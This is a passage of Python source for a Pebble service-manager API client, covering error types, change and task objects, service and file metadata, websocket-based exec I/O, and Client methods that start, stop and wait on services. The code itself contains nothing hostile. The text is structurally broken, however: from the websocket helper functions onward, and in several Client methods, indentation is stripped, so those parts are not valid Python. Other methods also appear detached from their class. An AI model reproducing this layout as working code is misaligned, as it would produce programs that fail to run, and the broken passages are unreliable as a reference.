        self.err = err        # error summary reported by Pebble
        self.change = change  # the Change the error came from

    def __str__(self):
        # Start with the error itself, then append any task logs.
        pieces = [self.err]
        for index, task in enumerate(self.change.tasks):
            if task.log:
                pieces.append('\n----- Logs from task {} -----\n'.format(index))
                pieces.append('\n'.join(task.log))
        if len(pieces) > 1:
            # At least one task had logs, so terminate the last section.
            pieces.append('\n-----')
        return ''.join(pieces)

    def __repr__(self):
        return 'ChangeError({!r}, {!r})'.format(self.err, self.change)
class ExecError(Error):
    """Raised when a :meth:`Client.exec` command returns a non-zero exit code.

    Attributes:
        command: Command line of command being executed.
        exit_code: The process's exit code. This will always be non-zero.
        stdout: If :meth:`ExecProcess.wait_output` was being called, this is
            the captured stdout as a str (or bytes if encoding was None). If
            :meth:`ExecProcess.wait` was being called, this is None.
        stderr: If :meth:`ExecProcess.wait_output` was being called and
            combine_stderr was False, this is the captured stderr as a str (or
            bytes if encoding was None). If :meth:`ExecProcess.wait` was being
            called or combine_stderr was True, this is None.
    """

    # Maximum number of captured output characters included in str(error).
    STR_MAX_OUTPUT = 1024

    def __init__(
        self,
        command: typing.List[str],
        exit_code: int,
        stdout: typing.Optional[typing.AnyStr],
        stderr: typing.Optional[typing.AnyStr],
    ):
        self.command = command
        self.exit_code = exit_code
        self.stdout = stdout
        self.stderr = stderr

    def __str__(self):
        parts = ['non-zero exit code {} executing {!r}'.format(
            self.exit_code, self.command)]
        for label, output in (('stdout', self.stdout), ('stderr', self.stderr)):
            if output is None:
                continue
            # Truncate long output so the message stays readable.
            suffix = ' [truncated]' if len(output) > self.STR_MAX_OUTPUT else ''
            parts.append(', {}={!r}{}'.format(
                label, output[:self.STR_MAX_OUTPUT], suffix))
        return ''.join(parts)
class WarningState(enum.Enum):
    """Enum of states for get_warnings() select parameter.

    The member value is sent verbatim as the 'select' query parameter.
    """

    ALL = 'all'
    PENDING = 'pending'
class ChangeState(enum.Enum):
    """Enum of states for get_changes() select parameter.

    The member value is sent verbatim as the 'select' query parameter.
    """

    ALL = 'all'
    IN_PROGRESS = 'in-progress'
    READY = 'ready'
class SystemInfo:
    """System information object."""

    def __init__(self, version: str):
        self.version = version  # Pebble server version string

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'SystemInfo':
        """Create new SystemInfo object from dict parsed from JSON."""
        return cls(version=d['version'])

    def __repr__(self):
        return 'SystemInfo(version={!r})'.format(self.version)
class Warning:
    """Warning object."""

    def __init__(
        self,
        message: str,
        first_added: datetime.datetime,
        last_added: datetime.datetime,
        last_shown: typing.Optional[datetime.datetime],
        expire_after: str,
        repeat_after: str,
    ):
        self.message = message
        self.first_added = first_added
        self.last_added = last_added
        self.last_shown = last_shown  # None if the warning was never shown
        self.expire_after = expire_after
        self.repeat_after = repeat_after

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'Warning':
        """Create new Warning object from dict parsed from JSON."""
        # A missing or empty 'last-shown' maps to None.
        last_shown = _parse_timestamp(d['last-shown']) if d.get('last-shown') else None
        return cls(
            message=d['message'],
            first_added=_parse_timestamp(d['first-added']),
            last_added=_parse_timestamp(d['last-added']),
            last_shown=last_shown,
            expire_after=d['expire-after'],
            repeat_after=d['repeat-after'],
        )

    def __repr__(self):
        template = ('Warning('
                    'message={self.message!r}, '
                    'first_added={self.first_added!r}, '
                    'last_added={self.last_added!r}, '
                    'last_shown={self.last_shown!r}, '
                    'expire_after={self.expire_after!r}, '
                    'repeat_after={self.repeat_after!r})')
        return template.format(self=self)
class TaskProgress:
    """Task progress object."""

    def __init__(
        self,
        label: str,
        done: int,
        total: int,
    ):
        self.label = label
        self.done = done    # units of work completed so far
        self.total = total  # total units of work

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'TaskProgress':
        """Create new TaskProgress object from dict parsed from JSON."""
        return cls(label=d['label'], done=d['done'], total=d['total'])

    def __repr__(self):
        template = ('TaskProgress('
                    'label={self.label!r}, '
                    'done={self.done!r}, '
                    'total={self.total!r})')
        return template.format(self=self)
class TaskID(str):
    """Task ID (a more strongly-typed string)."""

    def __repr__(self):
        return 'TaskID(%r)' % str(self)
class Task:
    """Task object (a single unit of work within a Change)."""

    def __init__(
        self,
        id: TaskID,
        kind: str,
        summary: str,
        status: str,
        log: typing.List[str],
        progress: TaskProgress,
        spawn_time: datetime.datetime,
        ready_time: typing.Optional[datetime.datetime],
        data: typing.Dict[str, typing.Any] = None,
    ):
        self.id = id
        self.kind = kind
        self.summary = summary
        self.status = status
        self.log = log
        self.progress = progress
        self.spawn_time = spawn_time
        self.ready_time = ready_time
        # Normalize a None data argument to an empty dict so callers can
        # index it safely.
        self.data = data or {}

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'Task':
        """Create new Task object from dict parsed from JSON."""
        return cls(
            id=TaskID(d['id']),
            kind=d['kind'],
            summary=d['summary'],
            status=d['status'],
            # A missing or null 'log' field maps to an empty list.
            log=d.get('log') or [],
            progress=TaskProgress.from_dict(d['progress']),
            spawn_time=_parse_timestamp(d['spawn-time']),
            # A missing or empty 'ready-time' maps to None.
            ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
            data=d.get('data') or {},
        )

    def __repr__(self):
        return ('Task('
                'id={self.id!r}, '
                'kind={self.kind!r}, '
                'summary={self.summary!r}, '
                'status={self.status!r}, '
                'log={self.log!r}, '
                'progress={self.progress!r}, '
                'spawn_time={self.spawn_time!r}, '
                'ready_time={self.ready_time!r}, '
                'data={self.data!r})'
                ).format(self=self)
class ChangeID(str):
    """Change ID (a more strongly-typed string)."""

    def __repr__(self):
        return 'ChangeID(%r)' % str(self)
class Change:
    """Change object (a requested operation, made up of zero or more tasks)."""

    def __init__(
        self,
        id: ChangeID,
        kind: str,
        summary: str,
        status: str,
        tasks: typing.List[Task],
        ready: bool,
        err: typing.Optional[str],
        spawn_time: datetime.datetime,
        ready_time: typing.Optional[datetime.datetime],
        data: typing.Dict[str, typing.Any] = None,
    ):
        self.id = id
        self.kind = kind
        self.summary = summary
        self.status = status
        self.tasks = tasks
        self.ready = ready
        # Error message if the change failed; used by ChangeError. None on success.
        self.err = err
        self.spawn_time = spawn_time
        self.ready_time = ready_time
        # Normalize a None data argument to an empty dict.
        self.data = data or {}

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'Change':
        """Create new Change object from dict parsed from JSON."""
        return cls(
            id=ChangeID(d['id']),
            kind=d['kind'],
            summary=d['summary'],
            status=d['status'],
            # A missing or null 'tasks' field maps to an empty list.
            tasks=[Task.from_dict(t) for t in d.get('tasks') or []],
            ready=d['ready'],
            err=d.get('err'),
            spawn_time=_parse_timestamp(d['spawn-time']),
            # A missing or empty 'ready-time' maps to None.
            ready_time=_parse_timestamp(d['ready-time']) if d.get('ready-time') else None,
            data=d.get('data') or {},
        )

    def __repr__(self):
        return ('Change('
                'id={self.id!r}, '
                'kind={self.kind!r}, '
                'summary={self.summary!r}, '
                'status={self.status!r}, '
                'tasks={self.tasks!r}, '
                'ready={self.ready!r}, '
                'err={self.err!r}, '
                'spawn_time={self.spawn_time!r}, '
                'ready_time={self.ready_time!r}, '
                'data={self.data!r})'
                ).format(self=self)
class Plan:
    """Represents the effective Pebble configuration."""

    def __init__(self, raw: str):
        parsed = yaml.safe_load(raw) or {}
        services = {}
        for name, service in parsed.get('services', {}).items():
            services[name] = Service(name, service)
        self._raw = raw
        self._services = services

    @property
    def services(self):
        """This plan's services mapping (maps service name to Service).

        This property is currently read-only.
        """
        return self._services

    def to_dict(self) -> typing.Dict[str, typing.Any]:
        """Convert this plan to its dict representation."""
        services = {name: service.to_dict()
                    for name, service in self._services.items()}
        # An empty plan serializes to an empty dict, not {'services': {}}.
        return {'services': services} if services else {}

    def to_yaml(self) -> str:
        """Return this plan's YAML representation."""
        return yaml.safe_dump(self.to_dict())

    __str__ = to_yaml
class Layer:
    """Represents a Pebble configuration layer.

    The format of this is not documented, but is captured in code here:
    https://github.com/canonical/pebble/blob/master/internal/plan/plan.go

    Attributes:
        summary: A summary of the purpose of this layer
        description: A long form description of this layer
        services: A mapping of name: :class:`Service` defined by this layer
    """

    def __init__(self, raw: typing.Union[str, typing.Dict] = None):
        # A YAML string is parsed first; a dict (or None) is used as-is.
        if isinstance(raw, str):
            parsed = yaml.safe_load(raw) or {}
        else:
            parsed = raw or {}
        self.summary = parsed.get('summary', '')
        self.description = parsed.get('description', '')
        self.services = {name: Service(name, service)
                         for name, service in parsed.get('services', {}).items()}

    def to_yaml(self) -> str:
        """Convert this layer to its YAML representation."""
        return yaml.safe_dump(self.to_dict())

    def to_dict(self) -> typing.Dict[str, typing.Any]:
        """Convert this layer to its dict representation (empty fields omitted)."""
        candidates = [
            ('summary', self.summary),
            ('description', self.description),
            ('services', {name: service.to_dict()
                          for name, service in self.services.items()}),
        ]
        return {key: value for key, value in candidates if value}

    def __repr__(self) -> str:
        return 'Layer({!r})'.format(self.to_dict())

    __str__ = to_yaml
class Service:
    """Represents a service description in a Pebble configuration layer."""

    def __init__(self, name: str, raw: typing.Dict = None):
        raw = raw or {}
        self.name = name
        self.summary = raw.get('summary', '')
        self.description = raw.get('description', '')
        self.startup = raw.get('startup', '')
        self.override = raw.get('override', '')
        self.command = raw.get('command', '')
        # Copy list/dict fields so the Service doesn't alias the input dict.
        self.after = list(raw.get('after', []))
        self.before = list(raw.get('before', []))
        self.requires = list(raw.get('requires', []))
        self.environment = dict(raw.get('environment', {}))
        self.user = raw.get('user', '')
        self.user_id = raw.get('user-id')
        self.group = raw.get('group', '')
        self.group_id = raw.get('group-id')

    def to_dict(self) -> typing.Dict:
        """Convert this service object to its dict representation (empty fields omitted)."""
        result = {}
        for key, value in (
            ('summary', self.summary),
            ('description', self.description),
            ('startup', self.startup),
            ('override', self.override),
            ('command', self.command),
            ('after', self.after),
            ('before', self.before),
            ('requires', self.requires),
            ('environment', self.environment),
            ('user', self.user),
            ('user-id', self.user_id),
            ('group', self.group),
            ('group-id', self.group_id),
        ):
            if value:
                result[key] = value
        return result

    def __repr__(self) -> str:
        return 'Service({!r})'.format(self.to_dict())

    def __eq__(self, other: typing.Union[typing.Dict, 'Service']) -> bool:
        """Compare this service description to another Service or plain dict."""
        if isinstance(other, Service):
            return self.to_dict() == other.to_dict()
        if isinstance(other, dict):
            return self.to_dict() == other
        raise ValueError(
            "Cannot compare pebble.Service to {}".format(type(other))
        )
class ServiceStartup(enum.Enum):
    """Enum of service startup options.

    The member value matches the 'startup' field of service info responses.
    """

    ENABLED = 'enabled'
    DISABLED = 'disabled'
class ServiceStatus(enum.Enum):
    """Enum of service statuses.

    The member value matches the 'current' field of service info responses.
    """

    ACTIVE = 'active'
    INACTIVE = 'inactive'
    ERROR = 'error'
class ServiceInfo:
    """Service status information."""

    def __init__(
        self,
        name: str,
        startup: typing.Union[ServiceStartup, str],
        current: typing.Union[ServiceStatus, str],
    ):
        self.name = name
        self.startup = startup  # ServiceStartup member, or raw string if unknown
        self.current = current  # ServiceStatus member, or raw string if unknown

    def is_running(self) -> bool:
        """Return True if this service is running (in the active state)."""
        return self.current == ServiceStatus.ACTIVE

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'ServiceInfo':
        """Create new ServiceInfo object from dict parsed from JSON.

        Unrecognized startup/current values fall back to the raw string so
        that newer servers don't break this client.
        """
        try:
            startup = ServiceStartup(d['startup'])
        except ValueError:
            startup = d['startup']
        try:
            current = ServiceStatus(d['current'])
        except ValueError:
            current = d['current']
        return cls(name=d['name'], startup=startup, current=current)

    def __repr__(self):
        template = ('ServiceInfo('
                    'name={self.name!r}, '
                    'startup={self.startup}, '
                    'current={self.current})')
        return template.format(self=self)
class FileType(enum.Enum):
    """Enum of file types.

    The member value matches the 'type' field of file info responses;
    unrecognized values are passed through as raw strings by
    FileInfo.from_dict.
    """

    FILE = 'file'
    DIRECTORY = 'directory'
    SYMLINK = 'symlink'
    SOCKET = 'socket'
    NAMED_PIPE = 'named-pipe'
    DEVICE = 'device'
    UNKNOWN = 'unknown'
class FileInfo:
    """Stat-like information about a single file or directory."""

    def __init__(
        self,
        path: str,
        name: str,
        type: typing.Union['FileType', str],
        size: typing.Optional[int],
        permissions: int,
        last_modified: datetime.datetime,
        user_id: typing.Optional[int],
        user: typing.Optional[str],
        group_id: typing.Optional[int],
        group: typing.Optional[str],
    ):
        self.path = path  # full path of the entry
        self.name = name  # base name of the entry
        # FileType member, or the raw string for types this client doesn't
        # know (see from_dict).
        self.type = type
        self.size = size  # None when the server omits the 'size' field
        self.permissions = permissions  # numeric permission bits
        self.last_modified = last_modified
        self.user_id = user_id
        self.user = user
        self.group_id = group_id
        self.group = group

    @classmethod
    def from_dict(cls, d: typing.Dict) -> 'FileInfo':
        """Create new FileInfo object from dict parsed from JSON."""
        # Fall back to the raw string for unrecognized types so that newer
        # servers don't break this client.
        try:
            file_type = FileType(d['type'])
        except ValueError:
            file_type = d['type']
        return cls(
            path=d['path'],
            name=d['name'],
            type=file_type,
            size=d.get('size'),
            # Permissions arrive as an octal string (e.g. "644").
            permissions=int(d['permissions'], 8),
            last_modified=_parse_timestamp(d['last-modified']),
            user_id=d.get('user-id'),
            user=d.get('user'),
            group_id=d.get('group-id'),
            group=d.get('group'),
        )

    def __repr__(self):
        return ('FileInfo('
                'path={self.path!r}, '
                'name={self.name!r}, '
                'type={self.type}, '
                'size={self.size}, '
                'permissions=0o{self.permissions:o}, '
                'last_modified={self.last_modified!r}, '
                'user_id={self.user_id}, '
                'user={self.user!r}, '
                'group_id={self.group_id}, '
                'group={self.group!r})'
                ).format(self=self)
class ExecProcess:
    """Represents a process started by :meth:`Client.exec`.

    To avoid deadlocks, most users should use :meth:`wait_output` instead of
    reading and writing the :attr:`stdin`, :attr:`stdout`, and :attr:`stderr`
    attributes directly. Alternatively, users can pass stdin/stdout/stderr to
    :meth:`Client.exec`.

    This class should not be instantiated directly, only via
    :meth:`Client.exec`.

    Attributes:
        stdin: If the stdin argument was not passed to :meth:`Client.exec`,
            this is a writable file-like object the caller can use to stream
            input to the process. It is None if stdin was passed to
            :meth:`Client.exec`.
        stdout: If the stdout argument was not passed to :meth:`Client.exec`,
            this is a readable file-like object the caller can use to stream
            output from the process. It is None if stdout was passed to
            :meth:`Client.exec`.
        stderr: If the stderr argument was not passed to :meth:`Client.exec`
            and combine_stderr was False, this is a readable file-like object
            the caller can use to stream error output from the process. It is
            None if stderr was passed to :meth:`Client.exec` or combine_stderr
            was True.
    """

    def __init__(
        self,
        stdin: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
        stdout: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
        stderr: typing.Optional[typing.Union[typing.TextIO, typing.BinaryIO]],
        client: 'Client',
        timeout: typing.Optional[float],
        control_ws: websocket.WebSocket,
        stdio_ws: websocket.WebSocket,
        stderr_ws: websocket.WebSocket,
        command: typing.List[str],
        encoding: typing.Optional[str],
        change_id: ChangeID,
        cancel_stdin: typing.Callable[[], None],
        cancel_reader: typing.Optional[int],
        threads: typing.List[threading.Thread],
    ):
        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
        self._client = client          # Client used to wait on the exec change
        self._timeout = timeout        # overall command timeout in seconds, or None
        self._control_ws = control_ws  # websocket for control messages (see send_signal)
        self._stdio_ws = stdio_ws
        self._stderr_ws = stderr_ws    # may be None (see _wait)
        self._command = command
        self._encoding = encoding      # text encoding, or None for bytes I/O
        self._change_id = change_id
        self._cancel_stdin = cancel_stdin    # callable that cancels the stdin pump; may be None
        self._cancel_reader = cancel_reader  # read-side fd of the cancel pipe; may be None
        self._threads = threads        # background I/O threads joined in _wait
        self._waited = False           # set by _wait(); checked in __del__

    def __del__(self):
        # Warn if the caller never waited: the change and I/O threads were
        # never reaped.
        if not self._waited:
            msg = 'ExecProcess instance garbage collected without call to wait() or wait_output()'
            warnings.warn(msg, ResourceWarning)

    def wait(self):
        """Wait for the process to finish.

        If a timeout was specified to the :meth:`Client.exec` call, this waits
        at most that duration.

        Raises:
            ChangeError: if there was an error starting or running the process.
            ExecError: if the process exits with a non-zero exit code.
        """
        exit_code = self._wait()
        if exit_code != 0:
            # No captured output in plain wait(); stdout/stderr are None.
            raise ExecError(self._command, exit_code, None, None)

    def _wait(self):
        # Wait for the change, tear down I/O threads and websockets, and
        # return the process exit code. The teardown order matters: stop the
        # stdin pump first, then join all threads, then close sockets.
        self._waited = True
        timeout = self._timeout
        if timeout is not None:
            # A bit more than the command timeout to ensure that happens first
            timeout += 1
        change = self._client.wait_change(self._change_id, timeout=timeout)

        # If stdin reader thread is running, stop it
        if self._cancel_stdin is not None:
            self._cancel_stdin()

        # Wait for all threads to finish (e.g., message barrier sent)
        for thread in self._threads:
            thread.join()

        # If we opened a cancel_reader pipe, close the read side now (the
        # write side was already closed by _cancel_stdin()).
        if self._cancel_reader is not None:
            os.close(self._cancel_reader)

        # Close websockets (shutdown doesn't send CLOSE message or wait for response).
        self._control_ws.shutdown()
        self._stdio_ws.shutdown()
        if self._stderr_ws is not None:
            self._stderr_ws.shutdown()

        if change.err:
            raise ChangeError(change.err, change)

        # The exit code is reported in the first task's data; -1 if missing.
        exit_code = -1
        if change.tasks:
            exit_code = change.tasks[0].data.get('exit-code', -1)
        return exit_code

    def wait_output(self) -> typing.Tuple[typing.AnyStr, typing.AnyStr]:
        """Wait for the process to finish and return tuple of (stdout, stderr).

        If a timeout was specified to the :meth:`Client.exec` call, this waits
        at most that duration. If combine_stderr was True, stdout will include
        the process's standard error, and stderr will be None.

        Raises:
            ChangeError: if there was an error starting or running the process.
            ExecError: if the process exits with a non-zero exit code.
        """
        # Buffer type follows the encoding: str buffers for text mode,
        # bytes buffers when encoding is None.
        if self._encoding is not None:
            out = io.StringIO()
            err = io.StringIO() if self.stderr is not None else None
        else:
            out = io.BytesIO()
            err = io.BytesIO() if self.stderr is not None else None

        # Pump stdout (and stderr if separate) into the buffers on
        # background threads; _wait() joins them.
        t = _start_thread(shutil.copyfileobj, self.stdout, out)
        self._threads.append(t)

        if self.stderr is not None:
            t = _start_thread(shutil.copyfileobj, self.stderr, err)
            self._threads.append(t)

        exit_code = self._wait()

        out_value = out.getvalue()
        err_value = err.getvalue() if err is not None else None
        if exit_code != 0:
            raise ExecError(self._command, exit_code, out_value, err_value)

        return (out_value, err_value)

    def send_signal(self, sig: typing.Union[int, str]):
        """Send the given signal to the running process.

        Args:
            sig: Name or number of signal to send, e.g., "SIGHUP", 1, or
                signal.SIGHUP.
        """
        # Pebble's control channel takes signal names, so map numbers to names.
        if isinstance(sig, int):
            sig = signal.Signals(sig).name
        payload = {
            'command': 'signal',
            'signal': {'name': sig},
        }
        msg = json.dumps(payload, sort_keys=True)
        self._control_ws.send(msg)
def _has_fileno(f):
"""Return True if the file-like object has a valid fileno() method."""
try:
f.fileno()
return True
except Exception:
# Some types define a fileno method that raises io.UnsupportedOperation,
# but just catching all exceptions here won't hurt.
return False
def _reader_to_websocket(reader, ws, encoding, cancel_reader=None, bufsize=16 * 1024):
"""Read reader through to EOF and send each chunk read to the websocket."""
while True:
if cancel_reader is not None:
# Wait for either a read to be ready or the caller to cancel stdin
result = select.select([cancel_reader, reader], [], [])
if cancel_reader in result[0]:
break
chunk = reader.read(bufsize)
if not chunk:
break
if isinstance(chunk, str):
chunk = chunk.encode(encoding)
ws.send_binary(chunk)
ws.send('{"command":"end"}') # Send "end" command as TEXT frame to signal EOF
def _websocket_to_writer(ws, writer, encoding):
"""Receive messages from websocket (until end signal) and write to writer."""
while True:
chunk = ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command (EOF signal), stop thread
break
if encoding is not None:
chunk = chunk.decode(encoding)
writer.write(chunk)
class _WebsocketWriter(io.BufferedIOBase):
"""A writable file-like object that sends what's written to it to a websocket."""
def __init__(self, ws):
self.ws = ws
def writable(self):
"""Denote this file-like object as writable."""
return True
def write(self, chunk):
"""Write chunk to the websocket."""
if not isinstance(chunk, bytes):
raise TypeError('value to write must be bytes, not {}'.format(type(chunk).__name__))
self.ws.send_binary(chunk)
return len(chunk)
def close(self):
"""Send end-of-file message to websocket."""
self.ws.send('{"command":"end"}')
class _WebsocketReader(io.BufferedIOBase):
"""A readable file-like object whose reads come from a websocket."""
def __init__(self, ws):
self.ws = ws
self.remaining = b''
self.eof = False
def readable(self):
"""Denote this file-like object as readable."""
return True
def read(self, n=-1):
"""Read up to n bytes from the websocket (or one message if n<0)."""
if self.eof:
# Calling read() multiple times after EOF should still return EOF
return b''
while not self.remaining:
chunk = self.ws.recv()
if isinstance(chunk, str):
try:
payload = json.loads(chunk)
except ValueError:
# Garbage sent, try to keep going
logger.warning('Cannot decode I/O command (invalid JSON)')
continue
command = payload.get('command')
if command != 'end':
# A command we don't recognize, keep going
logger.warning('Invalid I/O command {!r}'.format(command))
continue
# Received "end" command, return EOF designator
self.eof = True
return b''
self.remaining = chunk
if n < 0:
n = len(self.remaining)
result = self.remaining[:n]
self.remaining = self.remaining[n:]
return result
def read1(self, n=-1):
"""An alias for read."""
return self.read(n)
class Client:
"""Pebble API client."""
_chunk_size = 8192
def __init__(self, socket_path=None, opener=None, base_url='http://localhost', timeout=5.0):
"""Initialize a client instance.
Defaults to using a Unix socket at socket_path (which must be specified
unless a custom opener is provided).
"""
if opener is None:
if socket_path is None:
raise ValueError('no socket path provided')
opener = self._get_default_opener(socket_path)
self.socket_path = socket_path
self.opener = opener
self.base_url = base_url
self.timeout = timeout
@classmethod
def _get_default_opener(cls, socket_path):
    """Build the default opener to use for requests (HTTP over Unix socket)."""
    handlers = [
        _UnixSocketHandler(socket_path),  # route the connection over the Unix socket
        urllib.request.HTTPDefaultErrorHandler(),
        urllib.request.HTTPRedirectHandler(),
        urllib.request.HTTPErrorProcessor(),
    ]
    opener = urllib.request.OpenerDirector()
    for handler in handlers:
        opener.add_handler(handler)
    return opener
def _request(
    self, method: str, path: str, query: typing.Dict = None, body: typing.Dict = None,
) -> typing.Dict:
    """Make a JSON request to the Pebble server with the given HTTP method and path.

    If query dict is provided, it is encoded and appended as a query string
    to the URL. If body dict is provided, it is serialized as JSON and used
    as the HTTP body (with Content-Type: "application/json"). The resulting
    body is decoded from JSON.
    """
    headers = {'Accept': 'application/json'}
    if body is None:
        data = None
    else:
        data = json.dumps(body).encode('utf-8')
        headers['Content-Type'] = 'application/json'

    response = self._request_raw(method, path, query, headers, data)
    # The server must answer with JSON; anything else is a protocol error.
    self._ensure_content_type(response.headers, 'application/json')
    return _json_loads(response.read())
@staticmethod
def _ensure_content_type(headers, expected):
"""Parse Content-Type header from headers and ensure it's equal to expected.
Return a dict of any options in the header, e.g., {'boundary': ...}.
"""
ctype, options = cgi.parse_header(headers.get('Content-Type', ''))
if ctype != expected:
raise ProtocolError('expected Content-Type {!r}, got {!r}'.format(expected, ctype))
return options
def _request_raw(
    self, method: str, path: str, query: typing.Dict = None, headers: typing.Dict = None,
    data: bytes = None,
) -> http.client.HTTPResponse:
    """Make a request to the Pebble server; return the raw HTTPResponse object.

    Raises:
        APIError: if the server returned an HTTP error response; the error
            message is taken from the JSON body when possible.
        ConnectionError: if the request could not reach the server at all.
    """
    url = self.base_url + path
    if query:
        url = url + '?' + urllib.parse.urlencode(query)

    if headers is None:
        headers = {}
    request = urllib.request.Request(url, method=method, data=data, headers=headers)

    try:
        response = self.opener.open(request, timeout=self.timeout)
    except urllib.error.HTTPError as e:
        # Translate HTTP errors into APIError, extracting Pebble's own
        # error message from the JSON body when it parses cleanly.
        code = e.code
        status = e.reason
        try:
            body = _json_loads(e.read())
            message = body['result']['message']
        except (IOError, ValueError, KeyError) as e2:
            # Will only happen on read error or if Pebble sends invalid JSON.
            body = {}
            message = '{} - {}'.format(type(e2).__name__, e2)
        raise APIError(body, code, status, message)
    except urllib.error.URLError as e:
        # Transport-level failure (e.g. can't open the socket).
        raise ConnectionError(e.reason)

    return response
def get_system_info(self) -> SystemInfo:
    """Get system info."""
    result = self._request('GET', '/v1/system-info')['result']
    return SystemInfo.from_dict(result)
def get_warnings(self, select: WarningState = WarningState.PENDING) -> typing.List[Warning]:
    """Get list of warnings in given state (pending or all)."""
    resp = self._request('GET', '/v1/warnings', {'select': select.value})
    return [Warning.from_dict(item) for item in resp['result']]
def ack_warnings(self, timestamp: datetime.datetime) -> int:
"""Acknowledge warnings up to given timestamp, return number acknowledged."""
body = {'action': 'okay', 'timestamp': timestamp.isoformat()}
resp = self._request('POST', '/v1/warnings', body=body)
return resp['result']
def get_changes(
    self, select: ChangeState = ChangeState.IN_PROGRESS, service: str = None,
) -> typing.List[Change]:
    """Get list of changes in given state, filter by service name if given."""
    query = {'select': select.value}
    if service is not None:
        query['for'] = service  # filter changes to one service
    resp = self._request('GET', '/v1/changes', query)
    return [Change.from_dict(item) for item in resp['result']]
def get_change(self, change_id: ChangeID) -> Change:
    """Get single change by ID."""
    path = '/v1/changes/{}'.format(change_id)
    return Change.from_dict(self._request('GET', path)['result'])
def abort_change(self, change_id: ChangeID) -> Change:
    """Abort change with given ID."""
    path = '/v1/changes/{}'.format(change_id)
    resp = self._request('POST', path, body={'action': 'abort'})
    return Change.from_dict(resp['result'])
def autostart_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
    """Start the startup-enabled services and wait (poll) for them to be started.

    Args:
        timeout: Seconds before autostart change is considered timed out
            (float). If timeout is 0, submit the action but don't wait;
            just return the change ID immediately.
        delay: Seconds to wait between polling attempts (float).

    Returns:
        ChangeID of the autostart change.

    Raises:
        ChangeError: if one or more of the services didn't start.
    """
    return self._services_action('autostart', [], timeout, delay)
def replan_services(self, timeout: float = 30.0, delay: float = 0.1) -> ChangeID:
    """Replan by (re)starting changed and startup-enabled services and wait for them to start.

    Args:
        timeout: Seconds before replan change is considered timed out
            (float). If timeout is 0, submit the action but don't wait;
            just return the change ID immediately.
        delay: Seconds to wait between polling attempts (float).

    Returns:
        ChangeID of the replan change.

    Raises:
        ChangeError: if one or more of the services didn't stop/start.
    """
    return self._services_action('replan', [], timeout, delay)
def start_services(
    self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
    """Start services by name and wait (poll) for them to be started.

    Args:
        services: Non-empty list of services to start.
        timeout: Seconds before start change is considered timed out
            (float). If timeout is 0, submit the action but don't wait;
            just return the change ID immediately.
        delay: Seconds to wait between polling attempts (float).

    Returns:
        ChangeID of the start change.

    Raises:
        ChangeError: if one or more of the services didn't stop/start.
    """
    return self._services_action('start', services, timeout, delay)
def stop_services(
    self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
    """Stop services by name and wait (poll) for them to be stopped.

    Args:
        services: Non-empty list of services to stop.
        timeout: Seconds before stop change is considered timed out
            (float). If timeout is 0, submit the action but don't wait;
            just return the change ID immediately.
        delay: Seconds to wait between polling attempts (float).

    Returns:
        ChangeID of the stop change.

    Raises:
        ChangeError: if one or more of the services didn't stop/start.
    """
    return self._services_action('stop', services, timeout, delay)
def restart_services(
    self, services: typing.List[str], timeout: float = 30.0, delay: float = 0.1,
) -> ChangeID:
    """Restart services by name and wait (poll) for them to be started.

    Args:
        services: Non-empty list of services to restart.
        timeout: Seconds before restart change is considered timed out
            (float). If timeout is 0, submit the action but don't wait;
            just return the change ID immediately.
        delay: Seconds to wait between polling attempts (float).

    Returns:
        ChangeID of the restart change.

    Raises:
        ChangeError: if one or more of the services didn't stop/start.
    """
    return self._services_action('restart', services, timeout, delay)
def _services_action(
    self, action: str, services: typing.Iterable[str], timeout: float, delay: float,
) -> ChangeID:
    """Submit a services action and, if timeout is truthy, wait for the change.

    Raises ChangeError if the change was waited on and finished with an error.
    """
    if not isinstance(services, (list, tuple)):
        raise TypeError('services must be a list of str, not {}'.format(
            type(services).__name__))
    for entry in services:
        if not isinstance(entry, str):
            raise TypeError('service names must be str, not {}'.format(type(entry).__name__))

    resp = self._request(
        'POST', '/v1/services', body={'action': action, 'services': services})
    change_id = ChangeID(resp['change'])
    if timeout:
        change = self.wait_change(change_id, timeout=timeout, delay=delay)
        if change.err:
            raise ChangeError(change.err, change)
    return change_id
def wait_change(
    self, change_id: ChangeID, timeout: float = 30.0, delay: float = 0.1,
) -> Change:
    """Wait for the given change to be ready.

    If the Pebble server supports the /v1/changes/{id}/wait API endpoint,
    use that to avoid polling, otherwise poll /v1/changes/{id} every delay
    seconds.

    Args:
        change_id: Change ID of change to wait for.
        timeout: Maximum time in seconds to wait for the change to be
            ready. May be None, in which case wait_change never times out.
        delay: If polling, this is the delay in seconds between attempts.

    Returns:
        The Change object being waited on.

    Raises:
        TimeoutError: If the maximum timeout is reached.
    """
    try:
        # Prefer the wait endpoint: it blocks server-side instead of polling.
        return self._wait_change_using_wait(change_id, timeout)
    except NotImplementedError:
        # Pebble server doesn't support wait endpoint, fall back to polling
        return self._wait_change_using_polling(change_id, timeout, delay)
def _wait_change_using_wait(self, change_id, timeout):
"""Wait for a change to be ready using the wait-change API."""
deadline = time.time() + timeout if timeout is not None else None
# Hit the wait endpoint every Client.timeout-1 seconds to avoid long
# requests (the -1 is to ensure it wakes up before the socket timeout)
while True:
this_timeout = max(self.timeout - 1, 1) # minimum of 1 second
if timeout is not None:
time_remaining = deadline - time.time()
if time_remaining <= 0:
break
# Wait the lesser of the time remaining and Client.timeout-1
this_timeout = min(time_remaining, this_timeout)
try:
return self._wait_change(change_id, this_timeout)
except TimeoutError:
# Catch timeout from wait endpoint and loop to check deadline
pass
raise TimeoutError('timed out waiting for change {} ({} seconds)'.format(
change_id, timeout))
